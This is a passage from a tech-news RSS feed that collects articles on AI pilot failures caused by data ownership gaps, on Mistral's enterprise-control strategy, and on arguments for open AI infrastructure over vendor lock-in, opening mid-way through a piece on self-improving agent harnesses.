an optional component; it is what lets us trade human intuition for empirical evidence," Zhang said.</p><p>This reliance on strict verifiers also dictates where Self-Harness should be deployed. "The best deployment targets today are environments where failures can be measured and where trial-and-error is relatively safe," Zhang said, pointing to coding, internal workflow automation, and DevOps data pipelines as ideal use cases.</p><p>Conversely, enterprises should avoid fully automating harnesses in high-stakes or subjective fields. "The clearest red flags are domains where evaluation is subjective, delayed, non-deterministic, or costly to get wrong, such as medical decision-making, safety-critical infrastructure, or legal decisions."</p><h2><b>From prompt tweakers to feedback architects</b></h2><p>The introduction of self-improving agents does not mean coding or enterprise workflows will suddenly become human-free. The quality of collaboration between the human engineer and the AI is still paramount and difficult to capture with automated benchmarks. </p><p>Instead, the engineering profession is moving up the abstraction layer. "The role of enterprise engineers will shift from manually patching individual prompts or tool calls toward designing the feedback systems that make agent improvement possible," Zhang predicted. Moving forward, "the engineer becomes less of a prompt tweaker and more of a feedback architect."</p><p>As foundational models grow more capable, they will naturally absorb many capabilities that currently require manual harness engineering. "But once that happens, the harness will not disappear; its scope will move outward to connect the model to richer external environments," Zhang said. "Until that boundary moves beyond what humans can evaluate, humans will remain critical providers of feedback."</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why your AI pilot died in a data ownership meeting, not the demo]]></title>
<description><![CDATA[I have sat in enough post-pilot reviews to know how this story ends before anyone says a word. The pilot worked. The demo went well. The executive team was genuinely impressed, and someone in that room used the word “scale.” There was real energy. Leadership was aligned, the business case was sol...]]></description>
<link>https://tsecurity.de/de/3615095/it-security-nachrichten/why-your-ai-pilot-died-in-a-data-ownership-meeting-not-the-demo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615095/it-security-nachrichten/why-your-ai-pilot-died-in-a-data-ownership-meeting-not-the-demo/</guid>
<pubDate>Mon, 22 Jun 2026 12:08:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>I have sat in enough post-pilot reviews to know how this story ends before anyone says a word. The pilot worked. The demo went well. The executive team was genuinely impressed, and someone in that room used the word “scale.” There was real energy. Leadership was aligned, the business case was solid and the timeline looked achievable. Then three months passed. Then six. The deployment is still pending, the original team has scattered and the business has quietly concluded that IT is great at demos and slow at everything that follows.</p>



<p>I am not describing a technology failure. I am describing what happens when an AI initiative arrives at an organizational problem that predates it by years and finds no one with the authority to resolve it.</p>



<p>What killed the deployment was the meeting nobody planned for. It happened sometime after the pilot ended and before anyone had agreed on who owned the data the model needed to operate in production. I have watched this sequence play out often enough to stop treating it as a project management gap. It is a structural one, and it was waiting long before the first model was ever trained.</p>



<h2 class="wp-block-heading">The data question nobody ever had to answer</h2>



<p>Most enterprises have been managing data ownership ambiguity for decades. It was survivable because the technologies they relied on could work around it. A BI team could pull a clean extract for the quarterly report. A data warehouse could house a copy of the customer record without anyone deciding who was responsible for keeping it current. Shadow IT could build departmental workarounds that served specific needs without ever touching the underlying question of where authoritative ownership sat. Data was treated as a byproduct of operations, managed by whoever built the system that produced it, with no named owner accountable for its accuracy or use.</p>



<p>The cost of that arrangement was low enough, for long enough, that it never forced a decision. In many organizations I have worked with, asking who owns a specific dataset produces three different answers depending on who you ask. That was tolerable when the stakes were a dashboard that was sometimes wrong. It stops being tolerable when a production AI model is making workflow decisions or customer-facing recommendations based on whatever that dataset happens to contain on a given day.</p>



<p>Putting a model into production that operates on live customer data, contract language or financial records requires someone to make binding calls about access rights, update protocols, data lineage and accountability when the underlying data is wrong. Those are not technical decisions. They are organizational ones. They require a business owner who will stand behind the data, with the authority to make and enforce decisions about how it is used, updated and governed. The <a href="https://www.cio.com/article/4162306/data-debt-will-cripple-your-ai-strategy-if-left-unaddressed.html">data debt</a> that accumulated across years of deferred ownership decisions does not disappear when a pilot succeeds. It surfaces when you try to scale.</p>



<p>Organizations that had resolved this before their first AI deployment did not have better technology. They had usually been forced into the conversation by something else entirely: a regulatory exam, a failed ERP migration, a data breach that made the question of accountability suddenly expensive. The organizations that had not resolved it discovered what the ambiguity costs when AI made it impossible to defer any longer.</p>



<h2 class="wp-block-heading">What the meeting looks like and what it costs</h2>



<p>Here is how the meeting tends to go. The CIO or a project lead convenes the stakeholders whose data the production deployment will require. Sales says they own the customer relationship data, but Legal says the underlying record is a shared asset subject to retention policy. The data engineering team says they manage the pipeline but do not make ownership decisions about what flows through it. The CDO, if one exists, says any governance change requires a committee review and a documented policy update. Nobody is technically wrong. That is exactly what makes it so difficult to move.</p>



<p>What follows is usually a working group, a governance charter and an executive sponsor who was not in the room when the pilot was approved. These are not bad things, but they take time and they consume organizational energy that nobody budgeted for when the pilot looked like a clean success. The AI project is now waiting on an organizational redesign question that predates it by a decade.</p>



<p>I have seen this stall run six months. I have seen it run considerably longer. During that time, the CIO absorbs questions from the business about why the technology that worked so well in the demo is not yet live. The honest answer is that the organization is working through a governance question that the business itself has never resolved, but that answer does not land well in a status update. What the business experiences is an IT initiative that worked in a controlled environment and then stopped. That perception accumulates. The CIO who delivered an impressive pilot is now the CIO who cannot seem to execute.</p>



<p>By the time the data question is settled, the original business champion has often moved on to other priorities. The vendor relationship has cooled. The momentum that existed in the room after the demo is gone, and rebuilding it requires re-educating stakeholders who have already withdrawn. Each deployment that stalls this way makes the next proposal harder to fund and harder to staff with the business partners who matter.</p>



<p>The cost is not only the delayed deployment. It is the credibility spent in the gap and the reduced appetite for the initiative that comes after it.</p>



<h2 class="wp-block-heading">What the CIOs who got through it actually did</h2>



<p>The CIOs I have seen navigate this well made one consistent choice: they resolved data ownership before seeking approval to expand scope, treating it as a prerequisite the deployment required rather than something the deployment would eventually sort out. They forced the data conversation into the open at the level where binding decisions could actually be made. They brought it forward as a business decision, routed to whoever held authority over the relevant business processes and did not move forward until they had genuine alignment, the kind that would hold when the first access request actually landed.</p>



<p>Some of them used the pilot phase deliberately to surface the ambiguity. They ran the pilot on a constrained, clearly-owned dataset and watched where the ownership questions appeared as they tried to expand access. They documented those specifically. By the time they were presenting pilot results to the executive team, they had a clear account of the organizational work the deployment would require alongside the technical work. They did not present this as a problem. They presented it as part of the plan, which is what it is.</p>



<p>That approach requires more work before the first executive briefing. It is significantly faster in aggregate, and it changes what the CIO is accountable for. Framing the data conversation as a business decision, at the beginning, means the CIO is no longer absorbing blame for a governance failure that belongs to the organization. The deployment either moves forward with ownership settled or it does not move forward at all, and everyone in the room understands why. The organizations that skip this conversation tend to find out what it costs about four months after the demo. Some of them find out several times before they change the sequence.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Is Mistral late or savvy?]]></title>
<description><![CDATA[For the past few years, the most visible corner of the AI market has been easy to caricature: OpenAI gets the consumer attention, Anthropic gets the developer love, Google gets the benefit of the doubt with increasingly capable models and a complementary product suite, and everyone else gets to e...]]></description>
<link>https://tsecurity.de/de/3614975/ai-nachrichten/is-mistral-late-or-savvy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614975/ai-nachrichten/is-mistral-late-or-savvy/</guid>
<pubDate>Mon, 22 Jun 2026 11:19:13 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>For the past few years, the most visible corner of the AI market has been easy to caricature: OpenAI gets the consumer attention, Anthropic gets the developer love, Google gets the benefit of the doubt with increasingly capable models and a complementary product suite, and everyone else gets to explain why they’re not dead yet.</p>



<p>That’s unfair, of course, but not completely wrong. In AI, attention compounds and it’s leading to outsized revenue, with both <a href="https://www.reuters.com/technology/openai-files-us-ipo-after-anthropic-ai-giants-head-public-markets-2026-06-08/">OpenAI</a> and <a href="https://www.reuters.com/business/ai-giant-anthropic-confidentially-files-us-ipo-2026-06-01/">Anthropic</a> reportedly rushing toward trillion-dollar-sized IPOs on the backs of billions in revenue.</p>



<p>So it’s easy to underrate Mistral AI.</p>



<p>Honestly, I hadn’t thought of the Paris-based company for a year. Maybe longer. But then <a href="https://www.linkedin.com/feed/update/urn:li:activity:7472694983636971520/">Brian Hall announced he’s joining Mistral</a> as CMO, and I had an <a href="https://arresteddevelopment.fandom.com/wiki/Her%3F">Arrested Development “Her?” moment</a>. Hall, a longtime Microsoft exec, hired me at AWS and went on to run product marketing at Google Cloud. His move prompted curiosity because Mistral doesn’t dominate developer chatter in the United States or boast the same seemingly endless compute budgets as Anthropic or OpenAI. If the AI market is simply a race to build the biggest, most magical, most general-purpose model, Mistral isn’t the company to bet on.</p>



<p>But that’s the wrong question, and likely the wrong bet.</p>



<p>The more interesting question is when the enterprise AI market will revert to type and demand that AI deliver the same security, predictability, and control we’re used to from other IT investments. Here Mistral has a real story. As Hall notes, Mistral’s approach is to “prioritize AI for mission-critical environments that need the confidence and self-control to bet for the long term (with open weights and real sovereign capabilities).”</p>



<p>While this might have sounded like an overly hopeful talking point, it became real in June when <a href="https://www.reuters.com/technology/us-blocks-foreign-access-anthropics-most-advanced-ai-models-axios-reports-2026-06-13/">the US government ordered Anthropic to suspend access</a> for foreign nationals to its most advanced Fable 5 and Mythos 5 models. Anthropic said it would disable the models for all users because of the export-control directive. “Can this vendor be forced to turn us off?” is no longer a theoretical question.</p>



<p>That’s why Mistral’s quiet focus on enterprise control just might work.</p>



<h2 class="wp-block-heading"><a></a>The wrong race</h2>



<p>The enterprise control story is much more compelling than the narrative I used to hear. You know, the “Europe needs its own OpenAI” schtick. There is a market for “patriotic AI,” but it’s relatively small. The far bigger market is comprised of enterprises that just want AI that works, costs less (or delivers more) than expected, and can be customized while fitting their compliance requirements.</p>



<p>Though the company’s <a href="https://web.archive.org/web/20230726224506/https:/mistral.ai/">initial launch page</a> went out of its way to mention that the company was operating out of Europe and headquartered in Paris, since at least <a href="https://web.archive.org/web/20231030012147/https:/mistral.ai/">October 2023 Mistral’s product posture has centered on enterprise control</a>. Scattered throughout its current (and past) website are words like “customize,” “fine-tune,” “open source,” and “complete control.” Mistral pitches Studio for building and running AI apps, Forge for custom model training and alignment, Vibe for agentic work, Vibe for Code for coding workflows, and Compute for training and inference infrastructure. The company talks about observability, evals, guardrails, deployment portability, and running production AI “from edge to cloud.”</p>



<p>In other words, it sounds less like a chatbot company and more like an infrastructure company.</p>



<p>That positioning becomes clearer when you look underneath the product names.<a href="https://mistral.ai/news/ai-studio/"> Mistral AI Studio</a> includes an AI Registry that acts as a system of record for agents, models, data sets, judges, tools, and workflows. It tracks lineage, ownership, and versioning. It enforces access controls and promotion gates before deployment. That’s boring governance plumbing (and “boring” is good in enterprise IT, <a href="https://www.infoworld.com/article/4082782/boring-governance-is-the-path-to-real-ai-adoption.html">as I’ve written</a>).</p>



<p><a href="https://mistral.ai/news/forge/">Forge</a> may be even more important. Mistral describes it as a way for enterprises to train frontier-grade models on proprietary enterprise data. Rather than training on others’ copyrighted information strewn across the web or on a mountain of Reddit posts, Forge goes well beyond <a href="https://www.infoworld.com/article/2335814/what-is-retrieval-augmented-generation-more-accurate-and-reliable-llms.html">retrieval-augmented generation</a> (RAG) to not simply “read in” proprietary docs/info/etc., but rather to give an enterprise its own private OpenAI, as it were. </p>



<p>That’s super interesting.</p>



<p>But is it different? I mean, OpenAI and Anthropic can do plenty of this, with greater scale and the benefit of leading frontier models. Both have enterprise products, cloud partnerships, evals, agents, governance tools, and varying forms of model customization. Mistral’s bet with Forge isn’t that the big labs can’t customize models. It’s that some enterprises aren’t interested in customization as a side feature bolted onto a frontier API. It <em>is </em>the product. OpenAI and Anthropic can build everything around Forge but not Forge itself, because the one thing they almost certainly aren’t interested in selling is independence from them.</p>



<p>This is where Mistral may have found a useful seam, one that allows it to ask a different set of questions. What if the best enterprise model isn’t the smartest general-purpose model? What if the best model is the one that’s small enough to run where the customer needs it, open enough to inspect and adapt, cheap enough to use broadly, and specialized enough to do the job? What if “good enough, governable, and your own” beats “slightly smarter, mostly opaque, and rented”?</p>



<p>This won’t matter for every use case, of course. If I’m asking AI to reason through a spreadsheet or write code, I probably want the best model I can get. But for banks, defense agencies, manufacturers, utilities, telcos, and governments, “best” is multidimensional and includes questions like latency, auditability, etc. It’s why banks, for example, still run so many workloads on premises: They want control.</p>



<h2 class="wp-block-heading"><a></a>What about compute?</h2>



<p>None of this makes compute irrelevant. But it may change <em>how</em> compute matters.</p>



<p>If Mistral is trying to be a French version of OpenAI, its lack of hyperscale compute is a fatal weakness. It won’t outspend OpenAI, Oracle, Microsoft, Google, Amazon, SpaceX, or Anthropic. It probably won’t out-recruit them across every frontier research area, either. The AI market is already littered with companies that underestimated how quickly “good model” became “not good enough.”</p>



<p>But if Mistral is trying to become the enterprise-controlled AI layer for organizations that don’t want all intelligence to live behind someone else’s API, compute becomes a more nuanced issue. It still needs infrastructure, and Mistral seems to know it. After all, Mistral <a href="https://www.reuters.com/business/finance/frances-mistral-raises-830-million-debt-ai-data-centre-build-up-2026-03-30/">raised $830 million in debt to buy 13,800 Nvidia chips</a> for a data center near Paris. That’s a rounding error compared to OpenAI and Anthropic, of course, but the real question is whether Mistral can turn relative compute scarcity into a virtue, like <a href="https://www.amazon.jobs/content/en/our-workplace/leadership-principles">Amazon’s Leadership Principle “Frugality”</a> on steroids. If lower compute capacity leads Mistral to deliver smaller, more efficient, and more specialized models, which in turn helps enterprises maintain more control of their data at lower cost, then less really does become more.</p>



<p>Mistral’s compute challenge, then, is not to try and have as much compute as OpenAI. It’s to make customers care less about raw compute scale and more about deployment flexibility, specialization, and control.</p>



<p>That’s a hard sell. But it’s not a dumb one.</p>



<h2 class="wp-block-heading"><a></a>What Mistral must prove</h2>



<p>The bear case remains obvious. OpenAI has consumer distribution, developer mindshare, capital, and a brand that has basically become synonymous with AI. Anthropic has become the developer darling and has an unusually strong enterprise story of its own. Google has the models, the infrastructure, the data, and a bevy of complementary services. AWS, Microsoft, and Oracle have customer relationships and infrastructure.</p>



<p>Mistral has to prove that there’s room for another center of gravity. More specifically, it must prove three things.</p>



<p>First, it has to show that open-weight and controllable AI matter enough to influence buying decisions, not just conference panels. Everyone says they want control, just as most like the idea of open source. But proprietary software and cloud services still dominate the market. Mistral must make control feel like the easy button.</p>



<p>Second, it must prove that specialization beats generality in enough high-value markets. “Our model is almost as good” is not a strategy. “Our model is better for your bank, your government agency, or your retailer” just might be.</p>



<p>Third, it needs to establish a beachhead within enterprise IT before OpenAI and Anthropic become “boring” enough to satisfy the same buyers. This is the real race. The biggest AI companies are hiring enterprise sales teams, building admin controls, and cutting deals with every major cloud. Mistral’s window exists because the market is still young, but that window won’t stay open much longer.</p>



<p>If AI remains a model benchmark race, Mistral likely loses. But if AI keeps evolving to become grown-up enterprise infrastructure, Mistral has a real chance.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why open infrastructure will define the AI era]]></title>
<description><![CDATA[A new form of vendor lock-in is here. And it’s not proprietary languages or rigid enterprise software suites — it’s something more fundamental. It’s the very thing that writes the code.



JetBrains Research found that 74% of developers worldwide use AI tools. Claude Code, available only since Ma...]]></description>
<link>https://tsecurity.de/de/3614974/ai-nachrichten/why-open-infrastructure-will-define-the-ai-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614974/ai-nachrichten/why-open-infrastructure-will-define-the-ai-era/</guid>
<pubDate>Mon, 22 Jun 2026 11:19:12 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A new form of vendor lock-in is here. And it’s not proprietary languages or rigid enterprise software suites — it’s something more fundamental. It’s the very thing that writes the code.</p>



<p><a href="https://blog.jetbrains.com/research/2026/04/which-ai-coding-tools-do-developers-actually-use-at-work/">JetBrains Research</a> found that 74% of developers worldwide use AI tools. <a href="https://www.infoworld.com/article/4136718/claude-code-is-blowing-me-away.html">Claude Code</a>, available only since May 2025, is now the most popular AI coding tool, followed by <a href="https://www.infoworld.com/article/3829347/review-gemini-code-assist-is-good-at-coding.html">Gemini Code Assist</a> and <a href="https://www.infoworld.com/article/3609013/github-copilot-everything-you-need-to-know.html">GitHub Copilot</a>, according to Jellyfish’s 2026 <a href="https://jellyfish.co/resources/2026-state-of-engineering-management-report/">State of Engineering Management Report</a>.</p>



<p>The latter study also found that 91% of developers say their productivity has increased in the past 12 months. As coding output <a href="https://leaddev.com/ai/openai-says-there-are-easily-1000x-engineers-now">expectations are rewritten daily</a>, the engineering world is becoming heavily reliant on paid external AI services.</p>



<p><a href="https://www.linkedin.com/posts/markwoneill_how-to-optimize-token-consumption-for-ai-activity-7458329480994992128-AT9m?utm_source=share&amp;utm_medium=member_desktop&amp;rcm=ACoAAA-8zTABlsmtYe-zC-Uf5z3oD5nm6qXDVVo">Gartner predicts</a> that by 2028 spending on AI coding tokens could exceed developer salaries. Yet, <a href="https://www.infoworld.com/article/4183060/the-tokenmaxxing-backlash-is-coming.html">tokenmaxxing</a> while <a href="https://www.infoworld.com/article/4166817/vibe-coding-or-spec-driven-development-how-to-choose.html">vibe coding</a> through a vendor’s cloud-based API feels like a far cry from the open foundations of free programming languages and open models, which many of today’s AI platforms now abstract.</p>



<p>“Open infrastructure will be the backbone of the AI era,” says <a href="https://www.linkedin.com/in/farkasp/">Peter Farkas</a>, CEO of <a href="https://www.percona.com/">Percona</a>, a provider of open-source database solutions. “Right now, too many companies are building their entire AI strategy on top of proprietary platforms because the convenience is seductive.”</p>



<p>“It’s ‘three clicks’ to stand up a database or an AI service in a hyperscaler, and that convenience blinds people to the lock-in they’re signing up for,” he adds. “As AI workloads mature, organizations will realize that depending on one vendor for their data, models, runtime, and pricing is not a strategy.”</p>



<p><a href="https://www.infoworld.com/article/3973969/knowing-when-to-use-ai-coding-assistants.html">AI-assisted coding</a> is democratizing software engineering for non-engineers and <a href="https://leaddev.com/ai/ai-doesnt-create-great-developers-it-amplifies-them">accelerating top performers</a>. But if teams are always working within the confines of how one platform thinks the world should work, it could create locked-in toolsets at scale. And as <a href="https://techcrunch.com/2025/12/29/2025-was-the-year-ai-got-a-vibe-check/">AI platform costs rise</a>, a fundamental question arises: will software developers consume AI on their own terms, or on someone else’s?</p>



<p>There’s a strong case that the long-term winners in tech will be built on open-source standards and foundations, similar to the history of cloud-native computing and the internet itself.</p>



<p>“Open always wins,” says <a href="https://www.linkedin.com/in/brianalvey/">Brian Alvey</a>, CTO at <a href="https://wpvip.com/">WordPress VIP</a>, a managed WordPress hosting platform. “Not because it’s a fancy ideology, but because it gives you total freedom to adapt, evolve, and stay in control.”</p>



<p>Open infrastructure avoids a future where developers perpetually rent. “For AI to be useful to people at large, it can’t be something you’re paying rent for the rest of your life,” says <a href="https://www.linkedin.com/in/maniksurtani/">Manik Surtani</a>, CTO and co-founder of the <a href="https://aaif.io/">Agentic AI Foundation</a> (AAIF), a vendor-neutral home for open-source agentic AI technologies. “And it can’t be concentrated in one particular corporation or a small handful of corporations, because we know how that goes.”</p>



<h2 class="wp-block-heading">Pricey, closed, proprietary AI</h2>



<p>AI development today is traveling two parallel paths. On one path, <a href="https://leaddev.com/technical-direction/be-careful-open-source-ai">open-source AI</a> is thriving and fueling tremendous growth in the number and variety of AI models and tools. Just take the thousands of open-weight models on <a href="https://huggingface.co/">HuggingFace</a>, the community around the <a href="https://openclaw.ai/">OpenClaw</a> AI agent, or the many academic institutions publishing <a href="https://thenewstack.io/llms-can-now-trace-their-outputs-to-specific-training-data/">new breakthroughs</a>.</p>



<p>“Open-source models and tooling are hot on the heels of state-of-the-art, with interesting and boundary-pushing work being shared by labs and researchers across the world,” says Austin Parker, director of AI strategy at <a href="https://www.honeycomb.io/">Honeycomb</a>, an observability platform provider, citing frontier open-source models like <a href="https://mistral.ai/">Mistral</a>, <a href="https://github.com/deepseek-ai/deepseek-v3">DeepSeek</a>, and <a href="https://allenai.org/olmo2">Ai2’s OLMo</a> as examples.</p>



<p>Others agree. “There’s unprecedented openness at the model and tooling layer, with open-source models, frameworks, and orchestration advancing at remarkable speed,” says <a href="https://www.linkedin.com/in/markcollier/">Mark Collier</a>, general manager of AI and infrastructure at the <a href="https://www.linuxfoundation.org/">Linux Foundation</a>.</p>



<p>On the other path, we’re seeing heavy reliance on proprietary AI systems controlled by Anthropic, Cursor, Google, Microsoft, OpenAI, and others. As Collier says, “Many platforms are wrapping those open components in closed, opinionated interfaces that trade short-term speed for long-term constraints.”</p>



<p><a href="https://www.infoworld.com/article/2262355/what-is-open-source-software-open-source-and-foss-explained.html">Open source</a> and the AI tooling market don’t always mix well. LangChain’s <a href="https://github.com/langchain-ai/open-agent-platform">Open Agent Platform</a>, for instance, was open-sourced to much fanfare in 2025, but by 2026 had been deprecated, with the repository now recommending fully managed alternatives.</p>



<p>For <a href="https://www.linkedin.com/in/shaposhnik/">Roman Shaposhnik</a>, co-founder and CTO of <a href="https://nekko.ai/">Ainekko</a>, provider of an open-source, composable AI stack, the current AI platform landscape is reminiscent of <a href="https://devops.com/demystifying-the-low-code-category/">low-code and no-code platforms</a>, which promised democratization of software development but often <a href="https://www.infoworld.com/article/3958483/7-reasons-low-code-and-no-code-tools-fail-to-deliver.html">failed to deliver</a>, becoming synonymous with platform lock-in and inflexibility.</p>



<p>“Honestly, it feels familiar,” Shaposhnik says. “We have incredibly powerful AI tools right now, but most of them come bundled as tightly controlled platforms.” This is a risk for AI, he says, because the infrastructure, models, and hardware are tightly coupled. “If those layers are closed, you lose flexibility fast.”</p>



<p>Some abstractions that sit on top of models, like routing and agent frameworks, tend to be tightly coupled and optimized for certain models. Other platforms take the walled garden concept quite literally. Anthropic, for instance, has repeatedly made headlines for blocking access to its Claude models over <a href="https://www.tomshardware.com/tech-industry/artificial-intelligence/anthropic-nuked-a-companys-access-to-claude-stopping-60-employees-dead-in-their-tracks-support-via-google-form-is-the-only-recourse-for-vague-usage-policy-violation">vague policy violations</a>. The company recently shut off <a href="https://venturebeat.com/technology/anthropic-cracks-down-on-unauthorized-claude-usage-by-third-party-harnesses">competitor xAI’s use</a> and <a href="https://thenewstack.io/anthropic-agent-sdk-confusion/">stonewalled OpenCode</a>, drawing community backlash.</p>



<p>Moves toward increasingly closed systems don’t bode well for an AI economy already built on shaky economics. As <a href="https://www.linkedin.com/in/vikramsrivats/">Vikram Srivats</a>, head of product experience at <a href="https://www.wavemaker.com/">WaveMaker</a>, provider of an agentic application development platform, adds, “Given the unit economics of AI tooling and pace of accelerated change to keep up, it seems obvious that some will evolve to more of a closed system to be able to monetize and gain ROI.”</p>



<h2 class="wp-block-heading">Why openness matters in the AI era</h2>



<p>Reliance on proprietary AI platforms can create long-term operational dependencies. As systems become less interoperable, organizations may be forced to standardize on a single stack across data pipelines, models, and decision logic, says the Linux Foundation’s Collier.</p>



<p>“As infrastructure consolidates, enterprises become more exposed when platforms change direction, raise prices, or fall behind technically,” he says. “If you can’t change platforms without re-architecting your AI systems, you’ve already given up too much control.”</p>



<p>“When you build on someone else’s platform, you have to live by their rules and those rules always change,” adds WordPress VIP’s Alvey. “We’ve all seen this before, businesses wasting time and money building to serve Google, Facebook, YouTube, and the App Store, instead of building to serve their customers.”</p>



<p><a href="https://www.infoworld.com/article/2337012/get-used-to-cloud-vendor-lock-in.html">Platform lock-in</a> can also create direct business risk. As Ainekko’s Shaposhnik says, “It usually shows up as higher costs, fragile systems, and growing risk when it’s time to change direction.”</p>



<p>At Ainekko, an internal group called the <a href="https://www.eejournal.com/article/do-you-want-to-be-an-ai-plumber/">AI Plumbers</a> focuses on back-end AI infrastructure like inference, scheduling, memory, and hardware integration. “Their view is simple,” says Shaposhnik. “If those layers are closed, everything above them becomes fragile.”</p>



<p>Open standards, interfaces, and infrastructure provide a necessary hedge against closed systems to prevent this sort of fragility. “In the AI era, open infrastructure gives enterprises control, portability, and choice at exactly the time they need it most,” says Percona’s Farkas.</p>



<p>It can cost upwards of $100,000 to migrate enterprise software, <a href="https://cloudaware.com/blog/cloud-migration-costs/">according to Cloudaware</a>, making portability a major enterprise concern. From this perspective, procuring closed systems can become a costly architectural dependency.</p>



<p>Others argue that openness is a critical hedge against vendor concentration risks at large, especially if AI replaces human labor en masse. “If all of that economic value is now being concentrated in the hands of one or two companies,” says the AAIF’s Surtani, “that’s an order of magnitude bigger problem than we’ve seen in any other wave of computing.”</p>



<p>Instead, open foundations allow adaptability to evolving conditions so enterprises can swap out models, agents, data, hardware, and orchestration, as needed. “Open standards let those components change independently without breaking the system,” says Collier. </p>



<p>Openness can also help future-proof businesses against economic upheaval. “Open everything will help build a cushion for businesses and users to survive and thrive after the almost-certain correction in the current hype cycle,” says WaveMaker’s Srivats.</p>



<h2 class="wp-block-heading">Momentum toward open AI infrastructure</h2>



<p>At the industry level, momentum toward open AI infrastructure is growing. The <a href="https://www.linuxfoundation.org/press/linux-foundation-announces-the-formation-of-the-agentic-ai-foundation">establishment</a> of the <a href="https://aaif.io/author/aaif/">Agentic AI Foundation</a>, Anthropic’s donation of <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> (MCP), and Block’s donation of its <a href="https://aaif.io/projects/goose/">Goose agent</a> are significant ecosystem-wide moves toward openness. Other advances include the donation of <a href="https://thenewstack.io/llm-d-cncf-kubernetes-inference/">llm-d</a>, a <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html">Kubernetes</a> framework for LLM inference, to the Cloud Native Computing Foundation (CNCF).</p>



<p>For Parker, donations like this help ensure long-term support and care. “Open standards aren’t just the foundation of the internet, they’re the foundation of the AI space,” he says. “I predict that we’ll see these practices continue, especially as enterprise adoption increases in earnest,” he adds.</p>



<p>Still, some question whether this level of stewardship is enough for a rapidly evolving ecosystem. “The internet benefited early on from groups that helped keep vendors aligned,” says Shaposhnik. “In AI infrastructure, we don’t really have that yet.”</p>



<p>“All of us open source veterans are hopeful,” he says, “but we also need to adapt to this new reality in what we do regarding AI infrastructure.”</p>



<p>Beyond industry governing bodies, companies themselves are also spearheading open AI initiatives. Warp, an agentic development environment, recently <a href="https://thenewstack.io/warp-open-source-client/">went open source</a> amid closed-source rivals. Arcade.dev, meanwhile, is pushing an open-source <a href="https://www.arcade.dev/blog/agent-library/">Agent Library</a> for agentic memory.</p>



<h2 class="wp-block-heading">Where openness matters most in the AI stack</h2>



<p>While AI infrastructure can be open in many ways, a few layers stand out as especially important. First is the openness of the model itself. “Open-source models must be the foundation of future trust and value,” says WaveMaker’s Srivats.</p>



<p>“The forms of open infrastructure that reduce integration friction and accelerate adoption stand out,” adds <a href="https://www.linkedin.com/in/neeraj-abhyankar-9040141/">Neeraj Abhyankar</a>, VP of data and AI at <a href="https://www.rsystems.com/">R Systems</a>, a global digital solutions provider. For him, open model representation formats, open orchestration and execution layers, open agentic protocols, and open governance and metadata standards are all essential for enterprise flexibility.</p>



<p>Others place more value on the connective tissue between AI components. “The most important forms of open infrastructure are the ones that connect systems together,” says Collier. “That includes open APIs, metadata standards, identity and policy frameworks, and protocols for how models and agents communicate.” </p>



<p>Arguably, <a href="https://www.infoworld.com/article/4096223/10-mcp-servers-for-devops.html">MCP</a> has become the connective tissue between AI agents and the <a href="https://thenewstack.io/how-to-prepare-your-api-for-ai-agents/">broader API ecosystem</a>. “If we get MCP right we unlock the same level of interoperability between entities on the web and models driving them as we came to enjoy during the Web 2.0 era and the API-first boom,” says Shaposhnik. “If we don’t we risk massive proprietary lock-ins.”</p>



<p>Parker agrees that open protocols will underlie future AI progress. “We’ll see continued development and progress on AI agents which will rely on protocols like MCP and ACP [<a href="https://www.infoworld.com/article/4007686/a-developers-guide-to-ai-protocols-mcp-a2a-and-acp.html">Agent Client Protocol</a>] to interoperate with various clients and each other,” he says. Yet a gap remains around API conventions for models. “It would be nice if we could get a commitment from model providers to use a standard here.”</p>



<p>For the AAIF’s Surtani, opening up the protocol layer is the most important aspect. “I think it’s really important for interoperability, for choice,” he says. “It means you can bring your own agent, you can bring your own framework, you can bring your own harness, and pick what model you want.”</p>



<p>Open standards may also play a significant role within <a href="https://www.infoworld.com/article/4117620/edge-ai-the-future-of-ai-inference-is-smarter-local-compute.html">inference architecture</a>. “As AI expands to the edge, developers need visibility into how models run, how memory is used, and how performance scales,” says Shaposhnik. Open systems could make it easier to optimize, debug, and adapt while helping enterprises avoid observability fragmentation.</p>



<p>Lastly, <a href="https://www.infoworld.com/article/3498485/the-future-of-kubernetes-and-cloud-infrastructure.html">cloud-native architectural standards</a> are a key ingredient for open AI infrastructure. “We’re seeing Kubernetes become the missing link for people who want the hyperscaler-style convenience without hyperscaler lock-in,” says Percona’s Farkas. For him, Kubernetes has become the de facto hybrid enterprise deployment option for data, workloads, and AI components.</p>



<h2 class="wp-block-heading">History repeats itself</h2>



<p>The <a href="https://opensource.org/blog/the-2026-state-of-open-source-report">2026 State of Open Source Report</a> found avoiding vendor lock-in to be the primary driver of open source adoption. But beyond being a strategic decision for a single company, open infrastructure provides a layer for entire industries to be built upon.</p>



